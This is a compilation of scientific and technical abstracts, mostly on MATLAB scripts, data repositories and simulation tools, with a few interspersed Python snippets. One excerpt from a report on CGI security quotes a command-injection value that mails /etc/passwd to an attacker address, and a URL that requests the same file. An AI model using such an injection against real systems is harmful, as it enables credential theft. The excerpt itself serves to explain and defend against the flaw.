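import numpy as np
from scipy.signal import find_peaks

def count_events(trace, fs, threshold=0.05, min_gap_s=1e-4):
    """Count scattering pulses in a digitized FSC (or SSC) trace.
    `trace` is the sampled voltage, `fs` the sample rate in Hz; threshold and
    minimum pulse separation are illustrative values, not the paper's settings."""
    peaks, props = find_peaks(trace, height=threshold,
                              distance=max(1, int(min_gap_s * fs)))
    event_rate = len(peaks) / (len(trace) / fs)      # events per second
    return len(peaks), event_rate, props["peak_heights"]
```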
DOE Office of Scientific and Technical Information (OSTI.GOV)
Anderson, Mark A.; Bigelow, Matthew; Gilkey, Jeff C.
The Super Strypi SWIL is a six degree-of-freedom (6DOF) simulation for the Super Strypi Launch Vehicle that includes a subset of the Super Strypi NGC software (guidance, ACS and sequencer). Aerodynamic and propulsive forces, mass properties, ACS (attitude control system) parameters, guidance parameters and Monte-Carlo parameters are defined in input files. Output parameters are saved to a Matlab mat file.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Gardner, S; Gulam, M; Song, K
2014-06-01
Purpose: The Varian EDGE machine is a new stereotactic platform, combining Calypso and VisionRT localization systems with a stereotactic linac. The system includes TrueBeam DeveloperMode, making possible the use of XML scripting for automation of linac-related tasks. This study details the use of DeveloperMode to automate commissioning tasks for the Varian EDGE, thereby improving efficiency and measurement consistency. Methods: XML scripting was used for various commissioning tasks, including couch model verification, beam scanning, and isocenter verification. For couch measurements, point measurements were acquired for several field sizes (2×2, 4×4, 10×10 cm²) at 42 gantry angles for two couch models. Measurements were acquired with variations in couch position (rails in/out, couch shifted in each of the motion axes) and compared to treatment planning system (TPS)-calculated values, which were logged automatically through advanced planning interface (API) scripting functionality. For beam scanning, XML scripts were used to create custom MLC apertures. For isocenter verification, XML scripts were used to automate various Winston-Lutz-type tests. Results: For couch measurements, the time required for each set of angles was approximately 9 minutes. Without scripting, each set required approximately 12 minutes. Automated measurements required only one physicist, while manual measurements required at least two physicists to handle linac positions/beams and data recording. MLC apertures were generated outside of the TPS, and with the .xml file format, double-checking without use of the TPS/operator console was possible. Similar time efficiency gains were found for isocenter verification measurements. Conclusion: The use of XML scripting in TrueBeam DeveloperMode allows for efficient and accurate data acquisition during commissioning. The efficiency improvement is most pronounced for iterative measurements, exemplified by the time savings for couch modeling measurements (approximately 10 hours). The scripting also allowed for creation of the files in advance without requiring access to the TPS. The API scripting functionality enabled efficient creation/mining of TPS data. Finally, automation reduces the potential for human error in entering linac values at the machine console, and the script provides a log of measurements acquired for each session. This research was supported in part by a grant from Varian Medical Systems, Palo Alto, CA.
Oostenveld, Robert; Fries, Pascal; Maris, Eric; Schoffelen, Jan-Mathijs
2011-01-01
This paper describes FieldTrip, an open source software package that we developed for the analysis of MEG, EEG, and other electrophysiological data. The software is implemented as a MATLAB toolbox and includes a complete set of consistent and user-friendly high-level functions that allow experimental neuroscientists to analyze experimental data. It includes algorithms for simple and advanced analysis, such as time-frequency analysis using multitapers, source reconstruction using dipoles, distributed sources and beamformers, connectivity analysis, and nonparametric statistical permutation tests at the channel and source level. The implementation as toolbox allows the user to perform elaborate and structured analyses of large data sets using the MATLAB command line and batch scripting. Furthermore, users and developers can easily extend the functionality and implement new algorithms. The modular design facilitates the reuse in other software packages. PMID:21253357
Divergence Measures Tool:An Introduction with Brief Tutorial
2014-03-01
in detecting differences across a wide range of Arabic-language text files (they varied by genre, domain, spelling variation, size, etc.), our...other. 2 These measures have been put to many uses in natural language processing (NLP). In the evaluation of machine translation (MT...files uploaded into the tool must be .txt files in ASCII or UTF-8 format. • This tool has been tested on English and Arabic script, but should
Sridhar, Vishnu B; Tian, Peifang; Dale, Anders M; Devor, Anna; Saisan, Payam A
2014-01-01
We present database client software, Neurovascular Network Explorer 1.0 (NNE 1.0), that uses a MATLAB®-based Graphical User Interface (GUI) for interaction with a database of 2-photon single-vessel diameter measurements from our previous publication (Tian et al., 2010). These data are of particular interest for modeling the hemodynamic response. NNE 1.0 is downloaded by the user and then runs either as a MATLAB script or as a standalone program on a Windows platform. The GUI allows browsing the database according to parameters specified by the user, simple manipulation and visualization of the retrieved records (such as averaging and peak-normalization), and export of the results. Further, we provide the NNE 1.0 source code. With this source code, the user can database their own experimental results, given the appropriate data structure and naming conventions, and thus share their data in a user-friendly format with other investigators. NNE 1.0 provides an example of a seamless and low-cost solution for sharing of experimental data by a regular-size neuroscience laboratory and may serve as a general template, facilitating dissemination of biological results and accelerating data-driven modeling approaches.
Hidden markov model for the prediction of transmembrane proteins using MATLAB.
Chaturvedi, Navaneet; Shanker, Sudhanshu; Singh, Vinay Kumar; Sinha, Dhiraj; Pandey, Paras Nath
2011-01-01
Since membranous proteins play a key role in drug targeting, transmembrane protein prediction is an active and challenging area of the biological sciences. Location-based prediction of transmembrane proteins is significant for functional annotation of protein sequences. Hidden Markov model based methods have been widely applied for transmembrane topology prediction. Here we present a revised model, offering a better understanding than an existing one, for transmembrane protein prediction. A MATLAB script was built and compiled for parameter estimation of the model, and the model was applied to amino acid sequences to identify transmembrane segments and their adjacent locations. The estimated model of transmembrane topology was based on the TMHMM model architecture. Only 7 super states are defined in the given dataset, which were converted to 96 states on the basis of their length in sequence. The prediction accuracy of the model was observed to be about 74%, which is good enough in the area of transmembrane topology prediction. Therefore, we conclude that the hidden Markov model plays a crucial role in transmembrane helix prediction on the MATLAB platform and could also be useful for drug discovery strategies. The database is available for free from bioinfonavneet@gmail.com and vinaysingh@bhu.ac.in.
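To make the decoding step concrete, here is a generic Viterbi decoder in Python/NumPy; it illustrates how a trained HMM assigns a most-likely state path along a sequence and is not the authors' MATLAB implementation (array shapes and names are assumptions).

```python
import numpy as np

def viterbi(obs, log_start, log_trans, log_emit):
    """Most likely state path for observation indices `obs`, given log-probability arrays:
    log_start (n_states,), log_trans (n_states, n_states), log_emit (n_states, n_symbols)."""
    n_states, T = log_trans.shape[0], len(obs)
    score = np.full((T, n_states), -np.inf)
    back = np.zeros((T, n_states), dtype=int)
    score[0] = log_start + log_emit[:, obs[0]]
    for t in range(1, T):
        cand = score[t - 1][:, None] + log_trans       # (from_state, to_state)
        back[t] = cand.argmax(axis=0)
        score[t] = cand.max(axis=0) + log_emit[:, obs[t]]
    path = [int(score[-1].argmax())]
    for t in range(T - 1, 0, -1):
        path.append(int(back[t, path[-1]]))
    return path[::-1]
```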
Entity Resolution Workflow Installation Process and User Guide
2013-07-01
Program Files\\PostgreSQL\\9.1\\data superuser (postgres), service account (postgres) password: "password" Port #: 5432 Add an environment variable...in this report. • Run the script found in <GG_HOME>\\globalgraph-dist-1.4.6-final\\schema-ddl\\postgresSetup.bat. This script will set up Postgres...Username: postgres DB Admin PWD: password GlobalGraph App User: gguser GlobalGraph App PWD: password • Restart the Postgres service using the Windows
DOE Office of Scientific and Technical Information (OSTI.GOV)
Thorne, N; Kassaee, A
Purpose: To develop an algorithm which can calculate the Full Width Half Maximum (FWHM) of a Proton Pencil Beam from a 2D ion chamber array (IBA Matrixx) with limited spatial resolution (7.6 mm inter-chamber distance). The algorithm would allow beam FWHM measurements to be taken during daily QA without an appreciable time increase. Methods: Combinations of 147 MeV single spot beams were delivered onto an IBA Matrixx and concurrently onto EBT3 films as a standard. Data were collected around the Bragg Peak region and evaluated by a custom MATLAB script based on our algorithm using a least-squares analysis. A set of artificial data, modified with random noise, was also processed to test for robustness. Results: The MATLAB-script-processed Matrixx data show acceptable agreement (within 5%) with film measurements, with no single measurement differing by more than 1.8 mm. In cases where the spots show some degree of asymmetry, the algorithm is able to resolve the differences. The algorithm was able to process artificial data with noise up to 15% of the maximum value. Time assays showed each measurement took less than 3 minutes to perform, indicating that such measurements may be efficiently added to daily QA. Conclusion: The developed algorithm can be implemented in a daily QA program for Proton Pencil Beam Scanning (PBS) beams with the Matrixx to extract spot size and position information. The developed algorithm may be extended to small field sizes in the photon clinic.
DOE Office of Scientific and Technical Information (OSTI.GOV)
"rsed" is an R package that contains tools for stream editing: manipulating text files by making insertions, replacements, deletions, substitutions, or commenting. It hails from the powerful Unix command, "sed". While the "rsed" package is not nearly as powerful as "see", it is much simpler to use. R programmers often write scripts that may require simple manipulation of text files. "rsed" addresses that need.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Barnette, Daniel W.
eCo-PylotDB, written completely in Python, provides a script that parses incoming emails and prepares extracted data for submission to a database table. The script extracts the database server, the database table, the server password, and the server username all from the email address to which the email is sent. The database table is specified on the Subject line. Any text in the body of the email is extracted as user comments for the database table. Attached files are extracted as data files, with each file submitted to a specified table field but in separate rows of the targeted database table. Other information such as sender, date, time, and machine from which the email was sent is extracted and submitted to the database table as well. An email is sent back to the user specifying whether the data from the initial email was accepted or rejected by the database server. If rejected, the return email includes details as to why.
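The parsing scheme described above can be sketched with Python's standard email package; the field names and returned structure are assumptions for illustration, not the actual eCo-PylotDB code.

```python
import email
from email import policy

def parse_submission(raw_bytes):
    """Extract the pieces an email-driven database loader might need from one raw message."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    body = msg.get_body(preferencelist=("plain",))
    return {
        "table":      (msg["Subject"] or "").strip(),   # target table taken from the Subject line
        "sender":     msg["From"],
        "date":       msg["Date"],
        "comments":   body.get_content() if body else "",
        "data_files": [(part.get_filename(), part.get_payload(decode=True))
                       for part in msg.iter_attachments()],
    }
```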
Analyzed Boise Data for Oscillatory Hydraulic Tomography
Lim, David
2015-07-01
Data here have been "pre-processed" and "analyzed" from the raw data submitted to the GDR previously (raw data files found at http://gdr.openei.org/submissions/479, doi:10.15121/1176944, after 30 September 2017). First, we submit .mat files, which are the "pre-processed" data (MATLAB software is required to use these). Secondly, the csv files contain the submitted data in its final analyzed form before being used for inversion. Specifically, we have Fourier coefficients obtained from fast Fourier transform algorithms.
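As an illustration of how such Fourier coefficients are typically extracted from a pressure record, a minimal NumPy sketch follows; it assumes a known sampling rate and stimulation frequency and is not the project's own script.

```python
import numpy as np

def fourier_coefficient(signal, fs, f0):
    """Amplitude and phase of `signal` at the stimulation frequency f0 (Hz), sampled at fs (Hz).
    Works best when the record spans a whole number of periods of f0."""
    n = len(signal)
    freqs = np.fft.rfftfreq(n, d=1.0 / fs)
    spectrum = 2.0 * np.fft.rfft(signal) / n          # single-sided amplitude spectrum
    k = int(np.argmin(np.abs(freqs - f0)))            # bin closest to the forcing frequency
    return np.abs(spectrum[k]), np.angle(spectrum[k])
```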
Nonlinear Meshfree Analysis Program (NMAP) Version 1.0 (User’s Manual)
2012-12-01
divided by the number of time increments used in the analysis. In addition to prescribing total nodal displacements in the neutral file, users are...conditions, the user must define material properties, initial conditions, and a variety of control parameters for the NMAP analysis. These data are provided...a script file. Restart A restart function is provided in the NMAP code, where the user may restart an analysis using a set of restart files. In
Geology of Point Reyes National Seashore and vicinity, California: a digital database
Clark, Jospeh C.; Brabb, Earl E.
1997-01-01
This Open-File report is a digital geologic map database. This pamphlet serves to introduce and describe the digital data. There is no paper map included in the Open-File report. The report does include, however, a PostScript plot file containing an image of the geologic map sheet with explanation, as well as the accompanying text describing the geology of the area. For those interested in a paper plot of information contained in the database or in obtaining the PostScript plot files, please see the section entitled 'For Those Who Aren't Familiar With Digital Geologic Map Databases' below. This digital map database, compiled from previously published and unpublished data and new mapping by the authors, represents the general distribution of surficial deposits and rock units in Point Reyes and surrounding areas. Together with the accompanying text file (pr-geo.txt or pr-geo.ps), it provides current information on the stratigraphy and structural geology of the area covered. The database delineates map units that are identified by general age and lithology following the stratigraphic nomenclature of the U.S. Geological Survey. The scale of the source maps limits the spatial resolution (scale) of the database to 1:48,000 or smaller.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Prather, J. C.; Smith, S. K.; Watson, C. R.
The National Radiobiology Archives is a comprehensive effort to gather, organize, and catalog original data, representative specimens, and supporting materials related to significant radiobiology studies. This provides researchers with information for analyses which compare or combine results of these and other studies and with materials for analysis by advanced molecular biology techniques. This Programmer's Guide document describes the database access software, NRADEMO, and the subset loading script NRADEMO/MAINT/MAINTAIN, which comprise the National Laboratory Archives Distributed Access Package. The guide is intended for use by an experienced database management specialist. It contains information about the physical and logical organization of the software and data files. It also contains printouts of all the scripts and associated batch processing files. It is part of a suite of documents published by the National Radiobiology Archives.
Jordan, Teresa E.
2015-09-30
This submission of Utilization Analysis data to the Geothermal Data Repository (GDR) node of the National Geothermal Data System (NGDS) is in support of Phase 1 Low Temperature Geothermal Play Fairway Analysis for the Appalachian Basin (project DE-EE0006726). The submission includes data pertinent to the methods and results of an analysis of the Surface Levelized Cost of Heat (SLCOH) for US Census Bureau Places within the study area. This was calculated using a modification of a program called GEOPHIRES, available at http://koenraadbeckers.net/geophires/index.php. The MATLAB modules used in conjunction with GEOPHIRES, the MATLAB data input file, the GEOPHIRES output data file, and an explanation of the software components have been provided. Results of the SLCOH analysis appear on 4 .png image files as mapped risk of heat utilization. For each of the 4 image (.png) files, there is an accompanying georeferenced TIF (.tif) file by the same name. In addition to calculating SLCOH, this Task 4 also identified many sites that may be prospects for use of a geothermal district heating system, based on their size and industry, rather than on the SLCOH. An industry sorted listing of the sites (.xlsx) and a map of these sites plotted as a layer onto different iterations of maps combining the three geological risk factors (Thermal Quality, Natural Reservoir Quality, and Risk of Seismicity) has been provided. In addition to the 6 image (.png) files of the maps in this series, a shape (.shp) file and 7 associated files are included as well. Finally, supporting files (.pdf) describing the utilization analysis methodology and summarizing the anticipated permitting for a deep district heating system are supplied. UPDATE: Newer version of the Utilization Analysis has been added here: https://gdr.openei.org/submissions/878
GPFA-AB_Phase1UtilizationTask4DataUpload
Teresa E. Jordan
2015-09-30
This submission of Utilization Analysis data to the Geothermal Data Repository (GDR) node of the National Geothermal Data System (NGDS) is in support of Phase 1 Low Temperature Geothermal Play Fairway Analysis for the Appalachian Basin (project DE-EE0006726). The submission includes data pertinent to the methods and results of an analysis of the Surface Levelized Cost of Heat (SLCOH) for US Census Bureau ‘Places’ within the study area. This was calculated using a modification of a program called GEOPHIRES, available at http://koenraadbeckers.net/geophires/index.php. The MATLAB modules used in conjunction with GEOPHIRES, the MATLAB data input file, the GEOPHIRES output data file, and an explanation of the software components have been provided. Results of the SLCOH analysis appear on 4 .png image files as mapped ‘risk’ of heat utilization. For each of the 4 image (.png) files, there is an accompanying georeferenced TIF (.tif) file by the same name. In addition to calculating SLCOH, this Task 4 also identified many sites that may be prospects for use of a geothermal district heating system, based on their size and industry, rather than on the SLCOH. An industry sorted listing of the sites (.xlsx) and a map of these sites plotted as a layer onto different iterations of maps combining the three geological risk factors (Thermal Quality, Natural Reservoir Quality, and Risk of Seismicity) has been provided. In addition to the 6 image (.png) files of the maps in this series, a shape (.shp) file and 7 associated files are included as well. Finally, supporting files (.pdf) describing the utilization analysis methodology and summarizing the anticipated permitting for a deep district heating system are supplied.
NASA Astrophysics Data System (ADS)
Huang, Yibin; Zhan, Hongbin; Knappett, Peter S. K.
2018-04-01
Past studies modeling stream-aquifer interaction commonly account for vertical anisotropy in hydraulic conductivity, but rarely address horizontal anisotropy, which may exist in certain sedimentary environments. If present, horizontal anisotropy will greatly impact stream depletion and the amount of recharge a pumped aquifer captures from the river. This scenario requires a different and somewhat more sophisticated mathematical approach to model and interpret pumping test results than previous models used to describe captured recharge from rivers. In this study, a new mathematical model is developed to describe the spatiotemporal distribution of drawdown from stream-bank pumping with a well screened across a horizontally anisotropic, confined aquifer, laterally bounded by a river. This new model is used to estimate four aquifer parameters, including the magnitude and directions of the major and minor principal transmissivities and the storativity, based on the observed drawdown-time curves within a minimum of three non-collinear observation wells. In order to prove the efficacy of the new model, a MATLAB script file was programmed to conduct a four-parameter inversion to estimate the four parameters of concern. Comparing the results of analytical and numerical inversions, the accuracy of the estimated results from both inversions is acceptable, but the MATLAB program sometimes becomes problematic because of the difficulty of separating local minima from the global minimum. The new analytical model of this study appears applicable and robust in estimating parameter values for a horizontally anisotropic aquifer laterally bounded by a stream. In addition, the new model calculates the stream depletion rate as a function of stream-bank pumping. Unique to horizontally anisotropic and homogeneous aquifers, the stream depletion rate at any given pumping rate depends closely on the horizontal anisotropy ratio and the direction of the principal transmissivities relative to the stream bank.
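A hedged sketch of such a four-parameter inversion, using SciPy's least_squares with multiple starting points to reduce the risk of stopping in a local minimum (the difficulty noted above), is given below; drawdown_model is a placeholder for the paper's analytical solution and the parameter names are illustrative.

```python
import numpy as np
from scipy.optimize import least_squares

def fit_four_parameters(t, observed, drawdown_model, starts, bounds):
    """Estimate (T_major, T_minor, angle, S) by nonlinear least squares.
    `drawdown_model(t, params)` stands in for the analytical drawdown solution; restarting
    from several initial guesses (`starts`) lowers the chance of returning a local minimum."""
    best = None
    for x0 in starts:
        fit = least_squares(lambda p: drawdown_model(t, p) - observed, x0, bounds=bounds)
        if best is None or fit.cost < best.cost:
            best = fit
    return best.x, best.cost
```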
Plasma Interactions With Spacecraft (I)
2009-04-01
with the Windows, Red Hat Linux, and MacOS X environments. We wrote N2kScriptRunner, a C++ code that runs a Nascap-2k script outside of the Java ...console-based and with a Java interface), a stand-alone program that reads and writes Nascap-2k database files. This program has proved invaluable...surface currents for DSX and prototyped it in Java. A description of the algorithm and the prototype implementation is in Section 3. 1.5. DSX
Inquiry Response Security Issues with CGI Scripting and JAVA Implementations
1998-03-26
that looks like this? nobody@nowhere.com;mail badguys@hell.orgc/etc/passwd ; Now the open() statement will evaluate the following command: /usr/lib...sendmail nobody@nowhere.com; mail badguys@hell.orgdetc/passwd Unintentionally, open() has mailed the contents of the system password file to the remote...functions outside of the script. For example, the following URL requests a copy of /etc/passwd from the server machine: http://www.odci.gov/cgi-bin
Courtney, Jane; Woods, Elena; Scholz, Dimitri; Hall, William W; Gautier, Virginie W
2015-01-01
We introduce here MATtrack, an open source MATLAB-based computational platform developed to process multi-Tiff files produced by a photo-conversion time lapse protocol for live cell fluorescent microscopy. MATtrack automatically performs a series of steps required for image processing, including extraction and import of numerical values from Multi-Tiff files, red/green image classification using gating parameters, noise filtering, background extraction, contrast stretching and temporal smoothing. MATtrack also integrates a series of algorithms for quantitative image analysis enabling the construction of mean and standard deviation images, clustering and classification of subcellular regions and injection point approximation. In addition, MATtrack features a simple user interface, which enables monitoring of Fluorescent Signal Intensity in multiple Regions of Interest, over time. The latter encapsulates a region growing method to automatically delineate the contours of Regions of Interest selected by the user, and performs background and regional Average Fluorescence Tracking, and automatic plotting. Finally, MATtrack computes convenient visualization and exploration tools including a migration map, which provides an overview of the protein intracellular trajectories and accumulation areas. In conclusion, MATtrack is an open source MATLAB-based software package tailored to facilitate the analysis and visualization of large data files derived from real-time live cell fluorescent microscopy using photoconvertible proteins. It is flexible, user friendly, compatible with Windows, Mac, and Linux, and a wide range of data acquisition software. MATtrack is freely available for download at eleceng.dit.ie/courtney/MATtrack.zip.
Courtney, Jane; Woods, Elena; Scholz, Dimitri; Hall, William W.; Gautier, Virginie W.
2015-01-01
We introduce here MATtrack, an open source MATLAB-based computational platform developed to process multi-Tiff files produced by a photo-conversion time lapse protocol for live cell fluorescent microscopy. MATtrack automatically performs a series of steps required for image processing, including extraction and import of numerical values from Multi-Tiff files, red/green image classification using gating parameters, noise filtering, background extraction, contrast stretching and temporal smoothing. MATtrack also integrates a series of algorithms for quantitative image analysis enabling the construction of mean and standard deviation images, clustering and classification of subcellular regions and injection point approximation. In addition, MATtrack features a simple user interface, which enables monitoring of Fluorescent Signal Intensity in multiple Regions of Interest, over time. The latter encapsulates a region growing method to automatically delineate the contours of Regions of Interest selected by the user, and performs background and regional Average Fluorescence Tracking, and automatic plotting. Finally, MATtrack computes convenient visualization and exploration tools including a migration map, which provides an overview of the protein intracellular trajectories and accumulation areas. In conclusion, MATtrack is an open source MATLAB-based software package tailored to facilitate the analysis and visualization of large data files derived from real-time live cell fluorescent microscopy using photoconvertible proteins. It is flexible, user friendly, compatible with Windows, Mac, and Linux, and a wide range of data acquisition software. MATtrack is freely available for download at eleceng.dit.ie/courtney/MATtrack.zip. PMID:26485569
Sampling and sensitivity analyses tools (SaSAT) for computational modelling
Hoare, Alexander; Regan, David G; Wilson, David P
2008-01-01
SaSAT (Sampling and Sensitivity Analysis Tools) is a user-friendly software package for applying uncertainty and sensitivity analyses to mathematical and computational models of arbitrary complexity and context. The toolbox is built in Matlab®, a numerical mathematical software package, and utilises algorithms contained in the Matlab® Statistics Toolbox. However, Matlab® is not required to use SaSAT as the software package is provided as an executable file with all the necessary supplementary files. The SaSAT package is also designed to work seamlessly with Microsoft Excel but no functionality is forfeited if that software is not available. A comprehensive suite of tools is provided to enable the following tasks to be easily performed: efficient and equitable sampling of parameter space by various methodologies; calculation of correlation coefficients; regression analysis; factor prioritisation; and graphical output of results, including response surfaces, tornado plots, and scatterplots. Use of SaSAT is exemplified by application to a simple epidemic model. To our knowledge, a number of the methods available in SaSAT for performing sensitivity analyses have not previously been used in epidemiological modelling and their usefulness in this context is demonstrated. PMID:18304361
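For readers unfamiliar with these techniques, the sketch below shows Latin hypercube sampling and rank correlations in Python (SciPy 1.7 or later is assumed for scipy.stats.qmc); it is a generic illustration of the approach, not SaSAT code.

```python
import numpy as np
from scipy.stats import qmc, spearmanr

def lhs_sensitivity(model, lower, upper, n_samples=200, seed=1):
    """Sample the parameter space with a Latin hypercube and rank-correlate each
    parameter with the scalar model output (a simple global sensitivity screen)."""
    sampler = qmc.LatinHypercube(d=len(lower), seed=seed)
    params = qmc.scale(sampler.random(n_samples), lower, upper)
    output = np.array([model(p) for p in params])
    rho = [spearmanr(params[:, j], output).correlation for j in range(len(lower))]
    return params, output, rho
```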
Super Strypi HWIL 6DOF (Hardware-In-Loop six-degree-of-freedom) Rev. 2175
DOE Office of Scientific and Technical Information (OSTI.GOV)
Gilkey, Jeff C.; Harl, Nathan R.; Kowalchuk, Scott A.
2016-02-23
The Super Strypi HWIL is a six degree-of-freedom (6DOF) simulation for the Super Strypi Launch Vehicle. The simulation is used to test the NGC flight software including the navigation software. Aerodynamic and propulsive forces, mass properties, ACS (attitude control system) parameters are defined in input files. Output parameters are saved to a Matlab mat file.
2010-08-07
51 5.3.2 Abaqus VDLOAD Subroutine ... 55 VI. INTERPRETATION OF RESULTS AND DISCUSSION...VDLOAD SUBROUTINE ... 91 C. PYTHON SCRIPT TO CONVERT ABAQUS INPUT FILE TO LS-DYNA INPUT FILE...all of the simulations, which are the pressures applied from the Abaqus/Explicit VDLOAD subroutine. The entire model 22 including the boundary
Wilshire, Howard G.; Bedford, David R.; Coleman, Teresa
2002-01-01
3. Plottable map representations of the database at 1:24,000 scale in PostScript and Adobe PDF formats. The plottable files consist of a color geologic map derived from the spatial database, composited with a topographic base map in the form of the USGS Digital Raster Graphic for the map area. Color symbology from each of these datasets is maintained, which can cause plot file sizes to be large.
[Development of a Software for Automatically Generated Contours in Eclipse TPS].
Xie, Zhao; Hu, Jinyou; Zou, Lian; Zhang, Weisha; Zou, Yuxin; Luo, Kelin; Liu, Xiangxiang; Yu, Luxin
2015-03-01
The automatic generation of planning targets and auxiliary contours has been achieved in Eclipse TPS 11.0. The scripting language AutoHotkey was used to develop a software tool for automatically generated contours in Eclipse TPS. This software is named Contour Auto Margin (CAM) and is composed of operational functions for contours, script-generation visualization, and script file operations. Results: Ten cases of different cancers were separately selected; in Eclipse TPS 11.0, scripts generated by the software could not only automatically generate contours but also perform contour post-processing. For different cancers, there was no difference between automatically generated contours and manually created contours. CAM is a user-friendly and powerful software tool that can automatically generate contours quickly in Eclipse TPS 11.0. With the help of CAM, plan preparation time is greatly reduced and the working efficiency of radiation therapy physicists is improved.
FastScript3D - A Companion to Java 3D
NASA Technical Reports Server (NTRS)
Koenig, Patti
2005-01-01
FastScript3D is a computer program, written in the Java 3D(TM) programming language, that establishes an alternative language that helps users who lack expertise in Java 3D to use Java 3D for constructing three-dimensional (3D)-appearing graphics. The FastScript3D language provides a set of simple, intuitive, one-line text-string commands for creating, controlling, and animating 3D models. The first word in a string is the name of a command; the rest of the string contains the data arguments for the command. The commands can also be used as an aid to learning Java 3D. Developers can extend the language by adding custom text-string commands. The commands can define new 3D objects or load representations of 3D objects from files in formats compatible with such other software systems as X3D. The text strings can be easily integrated into other languages. FastScript3D facilitates communication between scripting languages [which enable programming of hyper-text markup language (HTML) documents to interact with users] and Java 3D. The FastScript3D language can be extended and customized on both the scripting side and the Java 3D side.
17 CFR 230.607 - Sales material to be filed.
Code of Federal Regulations, 2011 CFR
2011-04-01
... RULES AND REGULATIONS, SECURITIES ACT OF 1933 Regulation E-Exemption for Securities of Small Business... newspaper, magazine or other periodical; (b) The script of every radio or television broadcast; and (c...
17 CFR 230.607 - Sales material to be filed.
Code of Federal Regulations, 2012 CFR
2012-04-01
... RULES AND REGULATIONS, SECURITIES ACT OF 1933 Regulation E-Exemption for Securities of Small Business... newspaper, magazine or other periodical; (b) The script of every radio or television broadcast; and (c...
17 CFR 230.607 - Sales material to be filed.
Code of Federal Regulations, 2013 CFR
2013-04-01
... RULES AND REGULATIONS, SECURITIES ACT OF 1933 Regulation E-Exemption for Securities of Small Business... newspaper, magazine or other periodical; (b) The script of every radio or television broadcast; and (c...
17 CFR 230.607 - Sales material to be filed.
Code of Federal Regulations, 2014 CFR
2014-04-01
... RULES AND REGULATIONS, SECURITIES ACT OF 1933 Regulation E-Exemption for Securities of Small Business... newspaper, magazine or other periodical; (b) The script of every radio or television broadcast; and (c...
Lessons Learned from Daily Uplink Operations during the Deep Impact Mission
NASA Technical Reports Server (NTRS)
Stehly, Joseph S.
2006-01-01
The daily preparation of uplink products (commands and files) for Deep Impact was as problematic as the final encounter images were spectacular. The operations team was faced with many challenges during the six-month mission to comet Tempel 1. One of the biggest difficulties was that the Deep Impact Flyby and Impactor vehicles necessitated a high volume of uplink products while also utilizing a new uplink file transfer capability. The Jet Propulsion Laboratory (JPL) Multi-Mission Ground Systems and Services (MGSS) Mission Planning and Sequence Team (MPST) had the responsibility of preparing the uplink products for use on the two spacecraft. These responsibilities included processing nearly 15,000 flight products, modeling the states of the spacecraft during all activities for subsystem review, and ensuring that the proper commands and files were uplinked to the spacecraft. To guarantee this transpired and that the health and safety of the two spacecraft were not jeopardized, several new ground scripts and procedures were developed while the Deep Impact Flyby and Impactor spacecraft were en route to their encounter with Tempel-1. These scripts underwent several adaptations throughout the entire mission, up until three days before the separation of the Flyby and Impactor vehicles. The problems presented by Deep Impact's daily operations and the development of scripts and procedures to ease those challenges resulted in several valuable lessons learned. These lessons are now being integrated into the design of current and future MGSS missions at JPL.
DefEX: Hands-On Cyber Defense Exercise for Undergraduate Students
2011-07-01
Injection, and 4) File Upload. Next, the students patched the associated flawed Perl and PHP Hypertext Preprocessor (PHP) code. Finally, students...underlying script. The Zora XSS vulnerability existed in a PHP file that echoed unfiltered user input back to the screen. To eliminate the...vulnerability, students filtered the input using the PHP htmlentities function and retested the code. The htmlentities function translates certain ambiguous
General Mission Analysis Tool (GMAT) Acceptance Test Plan [Draft
NASA Technical Reports Server (NTRS)
Dove, Edwin; Hughes, Steve
2007-01-01
The information presented in this Acceptance Test Plan document shows the current status of the General Mission Analysis Tool (GMAT). GMAT is a software system developed by NASA Goddard Space Flight Center (GSFC) in collaboration with the private sector. The GMAT development team continuously performs acceptance tests in order to verify that the software continues to operate properly after updates are made. The GMAT development team consists of NASA/GSFC Code 583 software developers, NASA/GSFC Code 595 analysts, and contractors of varying professions. GMAT was developed to provide a development approach that maintains involvement from the private sector and academia, encourages collaborative funding from multiple government agencies and the private sector, and promotes the transfer of technology from government funded research to the private sector. GMAT contains many capabilities, such as integrated formation flying modeling and MATLAB compatibility. The propagation capabilities in GMAT allow for fully coupled dynamics modeling of multiple spacecraft, in any flight regime. Other capabilities in GMAT include: user-definable coordinate systems, 3-D graphics in any coordinate system GMAT can calculate, 2-D plots, branch commands, solvers, optimizers, GMAT functions, planetary ephemeris sources including DE405, DE200, SLP and analytic models, script events, impulsive and finite maneuver models, and many more. GMAT runs on Windows, Mac, and Linux platforms. Both the Graphical User Interface (GUI) and the GMAT engine were built and tested on all of the mentioned platforms. GMAT was designed for intuitive use from both the GUI and with an importable script language similar to that of MATLAB.
Plouff, Donald
1998-01-01
Computer programs were written in the Fortran language to process and display gravity data with locations expressed in geographic coordinates. The programs and associated processes have been tested for gravity data in an area of about 125,000 square kilometers in northwest Nevada, southeast Oregon, and northeast California. This report discusses the geographic aspects of data processing. Utilization of the programs begins with application of a template (printed in PostScript format) to transfer locations obtained with Global Positioning Systems to and from field maps and includes a 5-digit geographic-based map naming convention for field maps. Computer programs, with source codes that can be copied, are used to display data values (printed in PostScript format) and data coverage, insert data into files, extract data from files, shift locations, test for redundancy, and organize data by map quadrangles. It is suggested that 30-meter Digital Elevation Models needed for gravity terrain corrections and other applications should be accessed in a file search by using the USGS 7.5-minute map name as a file name, for example, file '40117_B8.DEM' contains elevation data for the map with a southeast corner at lat 40° 07' 30" N. and lon 117° 52' 30" W.
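The 5-digit naming convention can be expressed as a short function; the rule below is inferred from the single example given in the abstract (40117_B8.DEM), so treat it as an assumption and verify it before relying on it.

```python
def quad_filename(lat, lon):
    """Build a '40117_B8.DEM'-style name from the southeast-corner coordinates of a
    USGS 7.5-minute quadrangle (latitude north, longitude west given as a negative number).
    Inferred from the abstract's example, not taken from the original Fortran code."""
    lat_deg, lon_deg = int(lat), int(abs(lon))
    row = "ABCDEFGH"[int(round((lat - lat_deg) * 60.0 / 7.5))]    # 7.5-minute rows north of the degree line
    col = int(round((abs(lon) - lon_deg) * 60.0 / 7.5)) + 1       # 7.5-minute columns west of the degree line
    return f"{lat_deg}{lon_deg}_{row}{col}.DEM"

# quad_filename(40.125, -117.875) -> '40117_B8.DEM'
```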
Knudsen, Keith L.; Noller, Jay S.; Sowers, Janet M.; Lettis, William R.
1997-01-01
